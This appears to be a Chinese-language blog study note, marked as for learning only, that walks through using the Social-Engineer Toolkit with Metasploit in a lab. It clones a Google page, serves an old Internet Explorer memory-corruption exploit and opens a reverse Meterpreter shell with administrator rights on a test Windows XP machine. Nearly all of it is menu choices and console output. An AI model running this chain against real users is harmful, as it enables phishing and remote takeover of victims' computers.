!!!笔记仅供学习交流使用,请勿进行其他用途!!!
setoolkit是一个非常有用的社会工程学工具,里面有很多工具,这里作者只笔记下其最简单的使用方法。
setoolkit和Metasploit协同生成渗透网页流程:
Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 。。。。。。。 set> 1 #选项1 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 。。。。。。。 set> 2 #选项2 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 。。。。。。 set:webattack>2 #选项2,直接生成渗透网页攻击浏览器 1) Web Templates 。。。。。。。 set:webattack>1 #简单起见,使用现有模板 1. Java Required 2. Google 3. Facebook 4. Twitter 5. Yahoo set:webattack> Select a template:2 #克隆google Enter the browser exploit you would like to use [8]: 。。。。。。。 33) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09) 34) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14) 35) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0) 。。。。。。。 set:payloads>34 #使用34号漏洞 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker 。。。。。。。 set:payloads>2 #Meterpreter set:payloads> Port to use for the reverse [443]: 。。。。。。。 [-] This may take a few to load MSF... 。。。。。。。 。。。。。。。 resource (/root/.set/meta_config)> exploit -j #可以看到,setoolkit自动启动Metasploit,然后生成后台任务 [*] Exploit running as background job. msf exploit(ms09_002_memory_corruption) > [*] Started reverse handler on 192.168.19.128:443 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.19.128:8080/ [*] Server started. msf exploit(ms09_002_memory_corruption) > #当有IE浏览器浏览该漏洞网页时,会触发该漏洞 [-] 192.168.19.129 ms09_002_memory_corruption - Exception handling request: Connection reset by peer [*] 192.168.19.129 ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption [*] 192.168.19.129 ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption [*] Sending stage (769024 bytes) to 192.168.19.129 [*] Meterpreter session 1 opened (192.168.19.128:443 -> 192.168.19.129:1226) at 2014-06-01 23:26:09 +0800 #session被打开了 [*] Session ID 1 (192.168.19.128:443 -> 192.168.19.129:1226) processing InitialAutoRunScript 'migrate -f' [*] Current server process: IEXPLORE.EXE (1364) [*] Spawning notepad.exe process to migrate to [+] Migrating to 572 #meterpreter被自动转移到其他进程了 [+] Successfully migrated to process msf exploit(ms09_002_memory_corruption) > sessions #查看session Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP-PRO-VM\Administrator @ WINXP-PRO-VM 192.168.19.128:443 -> 192.168.19.129:1226 (192.168.19.129) msf exploit(ms09_002_memory_corruption) > sessions -i 1 #交互 [*] Starting interaction with 1... meterpreter > getuid Server username: WINXP-PRO-VM\Administrator
发表评论